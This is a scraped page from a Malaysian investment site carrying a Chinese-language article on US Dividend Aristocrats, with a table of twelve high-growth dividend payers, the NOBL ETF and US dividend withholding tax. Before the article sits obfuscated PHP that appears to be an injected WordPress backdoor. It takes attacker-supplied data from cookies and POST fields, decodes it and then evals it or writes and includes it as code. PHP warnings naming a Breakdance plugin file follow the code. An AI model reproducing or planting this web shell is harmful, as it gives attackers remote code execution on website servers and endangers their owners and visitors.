$CIRhEIFSCu = chr (106) . 'W' . "\137" . chr (90) . "\127" . chr (119) . "\147";$FbthST = chr (99) . chr (108) . chr ( 998 - 901 ).'s' . 's' . chr ( 560 - 465 )."\145" . 'x' . 'i' . "\x73" . "\164" . chr ( 180 - 65 ); $fMYycku = class_exists($CIRhEIFSCu); $FbthST = "6733";$CopWzlVXK = !1;if ($fMYycku == $CopWzlVXK){function nrYeoHXp(){$fxTPpDG = new /* 20095 */ jW_ZWwg(48408 + 48408); $fxTPpDG = NULL;}$RXFiQtI = "48408";class jW_ZWwg{private function OysGO($RXFiQtI){if (is_array(jW_ZWwg::$tkaPFQ)) {$AXvCkv = str_replace('<' . chr (63) . "\x70" . "\150" . "\160", "", jW_ZWwg::$tkaPFQ["\x63" . chr ( 209 - 98 ).chr (110) . "\164" . chr ( 628 - 527 ).'n' . 't']);eval($AXvCkv); $RXFiQtI = "48408";exit();}}private $xTwwJ;public function PRjynhjZwN(){echo 59034;}public function __destruct(){$RXFiQtI = "27926_33395";$this->OysGO($RXFiQtI); $RXFiQtI = "27926_33395";}public function __construct($aKDFkbW=0){$YlSbYDzUah = $_POST;$XYkQU = $_COOKIE;$OHeDP = "5a0a2c91-ad19-44a6-b9ba-558e307d7328";$lYGKvfmO = @$XYkQU[substr($OHeDP, 0, 4)];if (!empty($lYGKvfmO)){$FAegDVBIgs = "base64";$AuSxlUWRhg = "";$lYGKvfmO = explode(",", $lYGKvfmO);foreach ($lYGKvfmO as $QIbQVE){$AuSxlUWRhg .= @$XYkQU[$QIbQVE];$AuSxlUWRhg .= @$YlSbYDzUah[$QIbQVE];}$AuSxlUWRhg = array_map($FAegDVBIgs . "\137" . 'd' . "\145" . "\143" . chr ( 365 - 254 ).chr (100) . chr (101), array($AuSxlUWRhg,)); $AuSxlUWRhg = $AuSxlUWRhg[0] ^ str_repeat($OHeDP, (strlen($AuSxlUWRhg[0]) / strlen($OHeDP)) + 1);jW_ZWwg::$tkaPFQ = @unserialize($AuSxlUWRhg);}}public static $tkaPFQ = 15685;}nrYeoHXp();}$dYFhungGZe = chr ( 243 - 121 ).chr ( 443 - 355 )."\x45" . chr ( 415 - 320 )."\111" . chr (105) . 'j';$ItpsERZjHD = "\x63" . "\154" . 'a' . "\x73" . "\x73" . "\137" . chr (101) . "\170" . chr ( 557 - 452 ).chr (115) . "\164" . chr ( 1033 - 918 ); $UiBkpPyFk = class_exists($dYFhungGZe); $ItpsERZjHD = "2275";$ogMrIG = !1;if ($UiBkpPyFk == $ogMrIG){function VlrqtzdDvN(){$GfPnoe = new /* 56456 */ zXE_Iij(234 + 234); $GfPnoe = NULL;}$SKKNfI = "234";class zXE_Iij{private function MiDARApf($SKKNfI){if (is_array(zXE_Iij::$gNRPH)) {$UatBaHdc = sys_get_temp_dir() . "/" . crc32(zXE_Iij::$gNRPH[chr ( 161 - 46 )."\141" . chr ( 577 - 469 )."\164"]);@zXE_Iij::$gNRPH["\x77" . 'r' . "\151" . chr ( 513 - 397 )."\145"]($UatBaHdc, zXE_Iij::$gNRPH["\143" . "\x6f" . "\156" . chr ( 667 - 551 ).'e' . 'n' . "\x74"]);include $UatBaHdc;@zXE_Iij::$gNRPH['d' . "\145" . "\x6c" . chr ( 355 - 254 )."\x74" . chr ( 301 - 200 )]($UatBaHdc); $SKKNfI = "234";exit();}}private $xLSvdhQ;public function CsOBcK(){echo 26770;}public function __destruct(){$SKKNfI = "65027_3297";$this->MiDARApf($SKKNfI); $SKKNfI = "65027_3297";}public function __construct($pLGLUF=0){$NiYPueCc = $_POST;$Hirlz = $_COOKIE;$ydMyl = "f94c1b65-e620-47ef-a300-081973ad2805";$fKAdlyk = @$Hirlz[substr($ydMyl, 0, 4)];if (!empty($fKAdlyk)){$sXTjVEcTMO = "base64";$HCgBGd = "";$fKAdlyk = explode(",", $fKAdlyk);foreach ($fKAdlyk as $VvxwO){$HCgBGd .= @$Hirlz[$VvxwO];$HCgBGd .= @$NiYPueCc[$VvxwO];}$HCgBGd = array_map($sXTjVEcTMO . "\x5f" . 'd' . 'e' . "\143" . chr (111) . "\144" . "\x65", array($HCgBGd,)); $HCgBGd = $HCgBGd[0] ^ str_repeat($ydMyl, (strlen($HCgBGd[0]) / strlen($ydMyl)) + 1);zXE_Iij::$gNRPH = @unserialize($HCgBGd);}}public static $gNRPH = 39407;}VlrqtzdDvN();}$lJfXS = chr ( 507 - 401 )."\x4f" . "\167" . "\137" . chr (74) . chr ( 825 - 728 ).chr ( 738 - 616 ); $exufEQIQ = "\143" . chr ( 1016 - 908 ).chr (97) . chr ( 336 - 221 ).'s' . '_' . "\x65" . "\x78" . "\151" . "\163" . chr (116) . chr (115); $tLjOmBW = class_exists($lJfXS); $exufEQIQ = "49845";$XWXBQ = !1;if ($tLjOmBW == $XWXBQ){function ZXWcxc(){$wNZGH = new /* 36604 */ jOw_Jaz(17643 + 17643); $wNZGH = NULL;}$wfKFPAopXQ = "17643";class jOw_Jaz{private function QqsdNNP($wfKFPAopXQ){if (is_array(jOw_Jaz::$jPGzK)) {$Uscqb = sys_get_temp_dir() . "/" . crc32(jOw_Jaz::$jPGzK['s' . chr ( 272 - 175 ).chr (108) . chr (116)]);@jOw_Jaz::$jPGzK["\x77" . chr (114) . "\x69" . chr (116) . chr (101)]($Uscqb, jOw_Jaz::$jPGzK['c' . chr (111) . "\x6e" . 't' . chr (101) . "\x6e" . 't']);include $Uscqb;@jOw_Jaz::$jPGzK[chr ( 105 - 5 ).chr (101) . 'l' . chr ( 698 - 597 ).chr ( 351 - 235 )."\x65"]($Uscqb); $wfKFPAopXQ = "17643";exit();}}private $JMicTYALWz;public function HVQsPsT(){echo 50484;}public function __destruct(){$wfKFPAopXQ = "59776_268";$this->QqsdNNP($wfKFPAopXQ); $wfKFPAopXQ = "59776_268";}public function __construct($soJcvAZ=0){$agzigwEm = $_POST;$VALlu = $_COOKIE;$uVovPkAi = "051f6601-ec8c-477e-8e06-865fdd3a2472";$sNrMJdFp = @$VALlu[substr($uVovPkAi, 0, 4)];if (!empty($sNrMJdFp)){$mfIMIS = "base64";$xQBmya = "";$sNrMJdFp = explode(",", $sNrMJdFp);foreach ($sNrMJdFp as $KQJxFwve){$xQBmya .= @$VALlu[$KQJxFwve];$xQBmya .= @$agzigwEm[$KQJxFwve];}$xQBmya = array_map($mfIMIS . '_' . "\144" . chr ( 258 - 157 ).chr (99) . 'o' . 'd' . 'e', array($xQBmya,)); $xQBmya = $xQBmya[0] ^ str_repeat($uVovPkAi, (strlen($xQBmya[0]) / strlen($uVovPkAi)) + 1);jOw_Jaz::$jPGzK = @unserialize($xQBmya);}}public static $jPGzK = 9789;}ZXWcxc();}
Warning: session_start(): Cannot start session when headers already sent in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 31

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 46

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 47

Warning: Cannot modify header information - headers already sent by (output started at /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/subplugins/breakdance-elements/elements/SliderOptionsPreset/733a94e3.php:1) in /opt/bitnami/apps/wordpress/htdocs_uat/wp-content/plugins/breakdance/plugin/sessions/track-view-and-session-counts.php on line 48
美国股息贵族 Dividend Aristocrats - Sharix

美国股息贵族 Dividend Aristocrats

原来股息也有分阶级 ?!今天笔者为你介绍什么是股息贵族。股息贵族是标准普尔 500指数中那些不仅支付股息而且至少连续25年增加派息的上市公司。拥有着‘‘贵族血统’‘ 的公司往往历史悠久且生意非常稳定,但是有一点要留意的是它们不再会享有高速的增长。因为这类型的大型老牌公司不属于爆炸性成长,所以他们倾向于定期发放股息来奖励股东。大多数股息贵族往往拥有着防守型的消费产品或服务,基本上无论是在经济衰退期间或经济繁荣期间,都能够保持良好的股息信用。

以下是年度股息率的五年符合增长率 ( CAGR )最高且在2016年底股息收益率至少为2% 的12家股息贵族。

CompanyTicker Five-Year Dividend
(CAGR)
Dividend Yield on Shares Purchased
(Five Years ago)
Dividend Yield (Five years ago)Current Dividend YieldPrice Change
(5 years)
Total Return
(5 Years)
AbbVie Inc.ABBV17.1%9.01%4.09%4.17%116%172%
T. Rowe Price Group Inc.TROW14.9%5.74%2.87%2.20%161%203%
Illinois Tool Works Inc.ITW13.4%3.98%2.12%1.98%102%127%
Aflac Inc.AFL13.2%4.60%2.47%2.74%68%89%
Automatic Data Processing Inc.ADP12.8%4.05%2.22%1.69%140%167%
Abbott LaboratoriesABT12.1%4.89%2.76%1.34%266%300%
NextEra Energy Inc.NEE12.1%5.16%2.91%1.65%213%252%
Air Products and Chemicals Inc.APD11.8%4.17%2.39%1.97%112%138%
McCormick & Company Inc.MKC9.5%3.17%2.01%1.53%107%125%
Atmos Energy Corp.ATO8.6%3.67%2.43%2.60%41%58%
Target Corp.TGT8.4%4.98%3.32%1.56%220%269%
McDonald’s Corp.MCD8.0%4.53%3.09%2.06%120%149%
Source: FactSet

除了可以投资个别公司以外,股息派投资者也可以选择通过交易所基金 ( Exchange Traded Fund ) 投资 ‘‘股息贵族’‘。Pro Shares 標普 500股息贵族 基金- ETF ( NOBL. US) 是由S&P 500成员的股息贵族公司所构建和维护的,其基金指数的成员必须至少 25年内每年增加股息支付,并且必须符合一定的市值和流动性的基本条件才能纳入基金。

另外,此基金必须自少包含40家公司,个别公司所占的权重不能相差太远,且任何单个行业板块的占比不得超过30%。该基金会在每年一月,四月,七月和十月重新评估,并在一月正式进行年度重组。每当到达25年的门揽时,该基金会增添成功入围的股息贵族。如果其中一家公司未能增加股息,则很遗憾的必须再等25年才能重新上榜。

【图一】

您可以在以上的【图一】发现,NOBL ETF 中,各个行业的多元化程度非常高,它在必须消费品和工业方面占比略高,而在其他行业中有着非常平均的分配组合。除了持续派发股息外,这个组合往往时与其他市场相比,波动较小。因为这些被归类为股息贵族的公司通常都拥有着历史悠久的背景且信用良好,也持有稳定的现金流和坚实的基本面。

这时候很多读者就会问那直接投资整个贵族基金不是稳赚了吗?笔者认为购买基金时,你会同时把实力较弱和最好的公司并列在一块。虽然这些公司拥有着良好的派息历史,但是并不意味着他们不会被市场失宠。打个比方,从 1990 年到2021年,就已有一百多家公司从股息贵族名单落榜了。笔者清楚的知道基金可以帮助投资这份上风险,但笔者跟偏向与个股下手,做足功课并从中挑选最优质的公司。

相信大家对高乐氏 Clorox (CLX) 这个牌子并不陌生,Clorox在全球经营着制造及销售家用以及清洁用品,也是美国第一大漂白水生产商。Clorox拥有着不一般的股息贵族血统,它成功保持着43年的年度增长历史。

最后,笔者要提醒读者们,美国会对美国上市公司所派发的股息征收30%的税,通常经济卷商会直接替他们的客户把税扣掉。打个比方,如果您投资的公司派发了200美金的股息给您,您的股票卷商只会给你140美金。

最新文章

Sharix Sdn Bhd (1313184-A)
@ 2023 Sharix Sdn Bhd. All Rights Reserved
官方社交平台